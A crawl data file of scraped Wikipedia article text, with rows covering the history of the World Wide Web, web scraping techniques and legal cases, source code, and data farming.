frustrated web designers who formed the Web Standards Project (WaSP) in 1998 with the goal of cajoling compliance with standards. 56 A List Apart and CSS Zen Garden were influential websites that promoted good design and adherence to standards. 57 Nevertheless, AOL halted development of Netscape 58 and Microsoft was slow to update IE. 59 Mozilla and Apple both released browsers that aimed to be more standards compliant (Firefox and Safari), but were unable to dislodge IE as the dominant browser. As the Web grew in the mid 1990s, web directories and primitive search engines were created to index pages and allow people to find things. Commercial use restrictions on the Internet were lifted in 1995 when NSFNET was shut down. In the US, the online service America Online (AOL) offered their users a connection to the Internet via their own internal browser, using a dial-up Internet connection. In January 1994, Yahoo was founded by Jerry Yang and David Filo, then students at Stanford University. Yahoo Directory became the first popular web directory. Yahoo Search, launched the same year, was the first popular search engine on the World Wide Web. Yahoo became the quintessential example of a first mover on the Web. Online shopping began to emerge with the launch of Amazon's shopping site by Jeff Bezos in 1995 and eBay by Pierre Omidyar the same year. By 1994, Marc Andreessen's Netscape Navigator superseded Mosaic in popularity, holding the position for some time. Bill Gates outlined Microsoft's strategy to dominate the Internet in his Tidal Wave memo in 1995. 60 With the release of Windows 95 and the popular Internet Explorer browser, many public companies began to develop a Web presence. At first, people mainly anticipated the possibilities of free publishing and instant worldwide information. By the late 1990s, the directory model had given way to search engines, corresponding with the rise of Google Search, which developed new approaches to relevancy ranking. Directory features, while still commonly available, became after-thoughts to search engines. Netscape had a very successful IPO valuing the company at $2.9 billion despite the lack of profits and triggering the dot-com bubble. 61 Increasing familiarity with the Web led to the growth of direct Web-based commerce (e-commerce) and instantaneous group communications worldwide. Many dot-com companies, displaying products on hypertext webpages, were added into the Web. Over the next 5 years, over a trillion dollars was raised to fund thousands of startups consisting of little more than a website. During the dot-com boom, many companies vied to create a dominant web portal in the belief that such a website would best be able to attract a large audience that in turn would attract online advertising revenue. While most of these portals offered a search engine, they were not interested in encouraging users to find other websites and leave the portal and instead concentrated on "sticky" content. 62 In contrast, Google was a stripped-down search engine that delivered superior results. 63 It was a hit with users who switched from portals to Google. Furthermore, with AdWords, Google had an effective business model. 64 65 AOL bought Netscape in 1998. 66 In spite of their early success, Netscape was unable to fend off Microsoft. 67 Internet Explorer and a variety of other browsers almost completely replaced it. Faster broadband internet connections replaced many dial-up connections from the beginning of the 2000s. With the bursting of the dot-com bubble, many web portals either scaled back operations, floundered, 68 or shut down entirely. 69 70 71 AOL disbanded Netscape in 2003. 72 Web server software was developed to allow computers to act as web servers. The first web servers supported only static files, such as HTML (and images), but now they commonly allow embedding of server side applications. Web framework software enabled building and deploying web applications. Content management systems (CMS) were developed to organize and facilitate collaborative content creation. Many of them were built on top of separate content management frameworks. After Robert McCool joined Netscape, development on the NCSA HTTPd server languished. In 1995, Brian Behlendorf and Cliff Skolnick created a mailing list to coordinate efforts to fix bugs and make improvements to HTTPd. 73 They called their version of HTTPd, Apache. 74 Apache quickly became the dominant server on the Web. 75 After adding support for modules, Apache was able to allow developers to handle web requests with a variety of languages including Perl, PHP and Python. Together with Linux and MySQL, it became known as the LAMP platform. Following the success of Apache, the Apache Software Foundation was founded in 1999 and produced many open source web software projects in the same collaborative spirit. After graduating from UIUC, Andreessen and Jim Clark, former CEO of Silicon Graphics, met and formed Mosaic Communications Corporation in April 1994 to develop the Mosaic Netscape browser commercially. The company later changed its name to Netscape, and the browser was developed further as Netscape Navigator, which soon became the dominant web client. They also released the Netsite Commerce web server which could handle SSL requests, thus enabling e-commerce on the Web. 76 SSL became the standard method to encrypt web traffic. Navigator 1.0 also introduced cookies, but Netscape did not publicize this feature. Netscape followed up with Navigator 2 in 1995 introducing frames, Java applets and JavaScript. In 1998, Netscape made Navigator open source and launched Mozilla. 77 Microsoft licensed Mosaic from Spyglass and released Internet Explorer 1.0 that year and IE2 later the same year. IE2 added features pioneered at Netscape such as cookies, SSL, and JavaScript. The browser wars became a competition for dominance when Explorer was bundled with Windows. 78 79 This led to the United States v. Microsoft Corporation antitrust lawsuit. IE3, released in 1996, added support for Java applets, ActiveX, and CSS. At this point, Microsoft began bundling IE with Windows. IE3 managed to increase Microsoft's share of the browser market from under 10% to over 20%. 80 IE4, released the following year, introduced Dynamic HTML setting the stage for the Web 2.0 revolution. By 1998, IE was able to capture the majority of the desktop browser market. 67 It would be the dominant browser for the next fourteen years. Google released their Chrome browser in 2008 with the first JIT JavaScript engine, V8. Chrome overtook IE to become the dominant desktop browser in four years, 81 and overtook Safari to become the dominant mobile browser in two. 82 At the same time, Google open sourced Chrome's codebase as Chromium. 83 Ryan Dahl used Chromium's V8 engine in 2009 to power an event driven runtime system, Node.js, which allowed JavaScript code to be used on servers as well as browsers. This led to the development of new software stacks such as MEAN. Thanks to frameworks such as Electron, developers can bundle up node applications as standalone desktop applications such as Slack. Acer and Samsung began selling Chromebooks, cheap laptops running ChromeOS capable of running web apps, in 2011. Over the next decade, more companies offered Chromebooks. Chromebooks outsold MacOS devices in 2020 to become the second most popular OS in the world. 84 Other notable web browsers emerged including Mozilla's Firefox, Opera's Opera browser and Apple's Safari. Web pages were initially conceived as structured documents based upon HTML. They could include images, video, and other content, although the use of media was initially relatively limited and the content was mainly static. By the mid 2000s, new approaches to sharing and exchanging content, such as blogs and RSS, rapidly gained acceptance on the Web. The video-sharing website YouTube launched the concept of user-generated content. 85 As new technologies made it easier to create websites that behaved dynamically, the Web attained greater ease of use and gained a sense of interactivity which ushered in a period of rapid popularization. This new era also brought into existence social networking websites, such as Friendster, MySpace, Facebook, and Twitter, and photo- and video-sharing websites such as Flickr and, later, Instagram which gained users rapidly and became a central part of youth culture. Wikipedia's user-edited content quickly displaced the professionally-written Microsoft Encarta. 86 The popularity of these sites, combined with developments in the technology that enabled them, and the increasing availability and affordability of high-speed connections made video content far more common on all kinds of websites. This new media-rich model for information exchange, featuring user-generated and user-edited websites, was dubbed Web 2.0, a term coined in 1999 by Darcy DiNucci 87 and popularized in 2004 at the Web 2.0 Conference. The Web 2.0 boom drew investment from companies worldwide and saw many new service-oriented startups catering to a newly "democratized" Web. 88 89 90 91 92 93 JavaScript made the development of interactive web applications possible. Web pages could run JavaScript and respond to user input, but they could not interact with the network. Browsers could submit data to servers via forms and receive new pages, but this was slow compared to traditional desktop applications. Developers that wanted to offer sophisticated applications over the Web used Java or nonstandard solutions such as Adobe Flash or Microsoft's ActiveX. Microsoft added a little-noticed feature called XMLHttpRequest to Internet Explorer in 1999, which enabled a web page to communicate with the server while remaining visible. Developers at Oddpost used this feature in 2002 to create the first Ajax application, a webmail client that performed as well as a desktop application. 94 Ajax apps were revolutionary. Web pages evolved beyond static documents to full-blown applications. Websites began offering APIs in addition to webpages. Developers created a plethora of Ajax apps including widgets, mashups and new types of social apps. Analysts called it Web 2.0. 95 Browser vendors improved the performance of their JavaScript engines 96 and dropped support for Flash and Java. 97 98 Traditional client server applications were replaced by cloud apps. Amazon reinvented itself as a cloud service provider. The use of social media on the Web has become ubiquitous in everyday life. 99 100 The 2010s also saw the rise of streaming services, such as Netflix. In spite of the success of Web 2.0 applications, the W3C forged ahead with their plan to replace HTML with XHTML and represent all data in XML. In 2004, representatives from Mozilla, Opera, and Apple formed an opposing group, the Web Hypertext Application Technology Working Group (WHATWG), dedicated to improving HTML while maintaining backward compatibility. 101 For the next several years, websites did not transition their content to XHTML; browser vendors did not adopt XHTML2; and developers eschewed XML in favor of JSON. 102 By 2007, the W3C conceded and announced they were restarting work on HTML 103 and in 2009, they officially abandoned XHTML. 104 In 2019, the W3C ceded control of the HTML specification, now called the HTML Living Standard, to WHATWG. 105 Microsoft rewrote their Edge browser in 2021 to use Chromium as its code base in order to be more compatible with Chrome. 106 The increasing use of encrypted connections (HTTPS) enabled e-commerce and online banking. Nonetheless, the 2010s saw the emergence of various controversial trends, such as internet censorship and the growth of cybercrime, including web-based cyberattacks and ransomware. 107 108 Early attempts to allow wireless devices to access the Web used simplified formats such as i-mode and WAP. Apple introduced the first smartphone in 2007 with a full-featured browser. Other companies followed suit and in 2011, smartphone sales overtook PCs. 109 Since 2016, most visitors access websites with mobile devices 110 which led to the adoption of responsive web design. Apple, Mozilla, and Google have taken different approaches to integrating smartphones with modern web apps. Apple initially promoted web apps for the iPhone, but then encouraged developers to make native apps. 111 Mozilla announced Web APIs in 2011 to allow webapps to access hardware features such as audio, camera or GPS. 112 Frameworks such as Cordova and Ionic allow developers to build hybrid apps. Mozilla released a mobile OS designed to run web apps in 2012, 113 but discontinued it in 2015. 114 Google announced specifications for Accelerated Mobile Pages (AMP), 115 and progressive web applications (PWA) in 2015. 116 AMPs use a combination of HTML, JavaScript, and Web Components to optimize web pages for mobile devices; and PWAs are web pages that, with a combination of web workers and manifest files, can be saved to a mobile device and opened like a native app. The extension of the Web to facilitate data exchange was explored as an approach to create a Semantic Web (sometimes called Web 3.0). This involved using machine-readable information and interoperability standards to enable context-understanding programs to intelligently select information for users. 117 Continued extension of the Web has focused on connecting devices to the Internet, coined Intelligent Device Management. As Internet connectivity becomes ubiquitous, manufacturers have started to leverage the expanded computing power of their devices to enhance their usability and capability. Through Internet connectivity, manufacturers are now able to interact with the devices they have sold and shipped to their customers, and customers are able to interact with the manufacturer (and other providers) to access a lot of new content. 118 This phenomenon has led to the rise of the Internet of Things (IoT), 119 where modern devices are connected through sensors, software, and other technologies that exchange information with other devices and systems on the Internet. This creates an environment where data can be collected and analyzed instantly, providing better insights and improving the decision-making process. Additionally, the integration of AI with IoT devices continues to improve their capabilities, allowing them to predict customer needs and perform tasks, increasing efficiency and user satisfaction. Web3 (sometimes also referred to as Web 3.0) is an idea for a decentralized Web based on public blockchains, smart contracts, digital tokens and digital wallets. 120 Historiography of the Web poses specific challenges including, disposable data, missing links, lost content and archived websites, which have consequences for web historians. Sites such as the Internet Archive aim to preserve content. 121 122 |
142 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-3 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
143 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Source_code | In computing, source code, or simply code or source, is a plain text computer program written in a programming language. A programmer writes the human readable source code to control the behavior of a computer. Since a computer, at base, only understands machine code, source code must be translated before a computer can execute it. The translation process can be implemented three ways. Source code can be converted into machine code by a compiler or an assembler. The resulting executable is machine code ready for the computer. Alternatively, source code can be executed without conversion via an interpreter. An interpreter loads the source code into memory. It simultaneously translates and executes each statement. A method that combines compilation and interpretation is to first produce bytecode. Bytecode is an intermediate representation of source code that is quickly interpreted. The first programmable computers, which appeared at the end of the 1940s, 2 were programmed in machine language (simple instructions that could be directly executed by the processor). Machine language was difficult to debug and was not portable between different computer systems. 3 Initially, hardware resources were scarce and expensive, while human resources were cheaper. 4 As programs grew more complex, programmer productivity became a bottleneck. This led to the introduction of high-level programming languages such as Fortran in the mid 1950s. These languages abstracted away the details of the hardware, instead being designed to express algorithms that could be understood more easily by humans. 5 6 As instructions distinct from the underlying computer hardware, software is therefore relatively recent, dating to these early high-level programming languages such as Fortran, Lisp, and Cobol. 6 The invention of high-level programming languages was simultaneous with the compilers needed to translate the source code automatically into machine code that can be directly executed on the computer hardware. 7 Source code is the form of code that is modified directly by humans, typically in a high-level programming language. Object code can be directly executed by the machine and is generated automatically from the source code, often via an intermediate step, assembly language. While object code will only work on a specific platform, source code can be ported to a different machine and recompiled there. For the same source code, object code can vary significantly—not only based on the machine for which it is compiled, but also based on performance optimization from the compiler. 8 9 Most programs do not contain all the resources needed to run them and rely on external libraries. Part of the compiler's function is to link these files in such a way that the program can be executed by the hardware. 10 Software developers often use configuration management to track changes to source code files (version control). The configuration management system also keeps track of which object code file corresponds to which version of the source code file. 11 The number of lines of source code is often used as a metric when evaluating the productivity of computer programmers, the economic value of a code base, effort estimation for projects in development, and the ongoing cost of software maintenance after release. 12 Source code is also used to communicate algorithms between people e.g., code snippets online or in books. 13 Computer programmers may find it helpful to review existing source code to learn about programming techniques. 13 The sharing of source code between developers is frequently cited as a contributing factor to the maturation of their programming skills. 13 Some people consider source code an expressive artistic medium. 14 Source code often contains comments—blocks of text marked for the compiler to ignore. This content is not part of the program logic, but is instead intended to help readers understand the program. 15 Companies often keep the source code confidential in order to hide algorithms considered a trade secret. Proprietary, secret source code and algorithms are widely used for sensitive government applications such as criminal justice, which results in black box behavior with a lack of transparency into the algorithm's methodology. The result is avoidance of public scrutiny of issues such as bias. 16 Access to the source code (not just the object code) is essential to modifying it. 17 Understanding existing code is necessary to understand how it works 17 and before modifying it. 18 The rate of understanding depends both on the code base as well as the skill of the programmer. 19 Experienced programmers have an easier time understanding what the code does at a high level. 20 Software visualization is sometimes used to speed up this process. 21 Many software programmers use an integrated development environment (IDE) to improve their productivity. IDEs typically have several features built in, including a source-code editor that can alert the programmer to common errors. 22 Modification often includes code refactoring (improving the structure without changing functionality) and restructuring (improving structure and functionality at the same time). 23 Nearly every change to code will introduce new bugs or unexpected ripple effects, which require another round of fixes. 18 Code reviews by other developers are often used to scrutinize new code added to a project. 24 The purpose of this phase is often to verify that the code meets style and maintainability standards and that it is a correct implementation of the software design. 25 According to some estimates, code review dramatically reduce the number of bugs persisting after software testing is complete. 24 Along with software testing that works by executing the code, static program analysis uses automated tools to detect problems with the source code. Many IDEs support code analysis tools, which might provide metrics on the clarity and maintainability of the code. 26 Debuggers are tools that often enable programmers to step through execution while keeping track of which source code corresponds to each change of state. 27 Source code files in a high-level programming language must go through a stage of preprocessing into machine code before the instructions can be carried out. 7 After being compiled, the program can be saved as an object file and the loader (part of the operating system) can take this saved file and execute it as a process on the computer hardware. 10 Some programming languages use an interpreter instead of a compiler. An interpreter converts the program into machine code at run time, which makes them 10 to 100 times slower than compiled programming languages. 22 28 Software quality is an overarching term that can refer to a code's correct and efficient behavior, its reusability and portability, or the ease of modification. 29 It is usually more cost-effective to build quality into the product from the beginning rather than try to add it later in the development process. 30 Higher quality code will reduce lifetime cost to both suppliers and customers as it is more reliable and easier to maintain. 31 32 Maintainability is the quality of software enabling it to be easily modified without breaking existing functionality. 33 Following coding conventions such as using clear function and variable names that correspond to their purpose makes maintenance easier. 34 Use of conditional loop statements only if the code could execute more than once, and eliminating code that will never execute can also increase understandability. 35 Many software development organizations neglect maintainability during the development phase, even though it will increase long-term costs. 32 Technical debt is incurred when programmers, often out of laziness or urgency to meet a deadline, choose quick and dirty solutions rather than build maintainability into their code. 36 A common cause is underestimates in software development effort estimation, leading to insufficient resources allocated to development. 37 A challenge with maintainability is that many software engineering courses do not emphasize it. 38 Development engineers who know that they will not be responsible for maintaining the software do not have an incentive to build in maintainability. 18 The situation varies worldwide, but in the United States before 1974, software and its source code was not copyrightable and therefore always public domain software. 39 In 1974, the US Commission on New Technological Uses of Copyrighted Works (CONTU) decided that "computer programs, to the extent that they embody an author's original creation, are proper subject matter of copyright". 40 41 Proprietary software is rarely distributed as source code. 42 Although the term open-source software literally refers to public access to the source code, 43 open-source software has additional requirements: free redistribution, permission to modify the source code and release derivative works under the same license, and nondiscrimination between different uses—including commercial use. 44 45 The free reusability of open-source software can speed up development. 46 |
144 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_farming | Data farming is the process of using designed computational experiments to “grow” data, which can then be analyzed using statistical and visualization techniques to obtain insight into complex systems. These methods can be applied to any computational model. Data farming differs from Data mining, as the following metaphors indicate: Miners seek valuable nuggets of ore buried in the earth, but have no control over what is out there or how hard it is to extract the nuggets from their surroundings. ... Similarly, data miners seek to uncover valuable nuggets of information buried within massive amounts of data. Data-mining techniques use statistical and graphical measures to try to identify interesting correlations or clusters in the data set. Farmers cultivate the land to maximize their yield. They manipulate the environment to their advantage using irrigation, pest control, crop rotation, fertilizer, and more. Small-scale designed experiments let them determine whether these treatments are effective. Similarly, data farmers manipulate simulation models to their advantage, using large-scale designed experimentation to grow data from their models in a manner that easily lets them extract useful information. ...the results can reveal root cause-and-effect relationships between the model input factors and the model responses, in addition to rich graphical and statistical views of these relationships. 1 A NATO modeling and simulation task group has documented the data farming process in the Final Report of MSG 088. 2 Here, data farming uses collaborative processes in combining rapid scenario prototyping, simulation modeling, design of experiments, high performance computing, and analysis and visualization in an iterative loop-of-loops. 3 The science of Design of Experiments (DOE) has been around for over a century, pioneered by R.A. Fisher for agricultural studies. Many of the classic experiment designs can be used in simulation studies. However, computational experiments have far fewer restrictions than do real-world experiments, in terms of costs, number of factors, time required, ability to replicate, ability to automate, etc. Consequently, a framework specifically oriented toward large-scale simulation experiments is warranted. People have been conducting computational experiments for as long as computers have been around. The term “data farming” is more recent, coined in 1998 4 in conjunction with the Marine Corp's Project Albert, 5 in which small agent-based distillation models (a type of stochastic simulation) were created to capture specific military challenges. These models were run thousands or millions of times at the Maui High Performance Computer Center 6 and other facilities. Project Albert analysts would work with the military subject matter experts to refine the models and interpret the results. Initially, the use of brute-force full factorial (gridded) designs meant that the simulations needed to run very quickly and the studies required high-performance computing. Even so, only a small number of factors (at a limited number of levels) could be investigated, due to the curse of dimensionality. The SEED Center for Data Farming 7 at the Naval Postgraduate School 8 also worked closely with Project Albert in model generation, output analysis, and the creation of new experimental designs to better leverage the computing capabilities at Maui and other facilities. Recent breakthroughs in designs specifically developed for data farming can be found in 9 10 among others. A series of international data farming workshops have been held since 1998 by the SEED Center for Data Farming. 11 International Data Farming Workshop 1 occurred in 1991, and since then 16 more workshops have taken place. The workshops have seen a diverse array of representation from participating countries, such as Canada, Singapore, Mexico, Turkey, and the United States. 12 The International Data Farming Workshops operate through collaboration between various teams of experts. The most recent workshop held in 2008 saw over 100 teams participating. The teams of data farmers are assigned a specific area of study, such as robotics, homeland security, and disaster relief. Different forms of data farming are experimented with and utilized by each group, such as the Pythagoras ABM, the Logistics Battle Command model, and the agent-based sensor effector model (ABSEM). 12 |
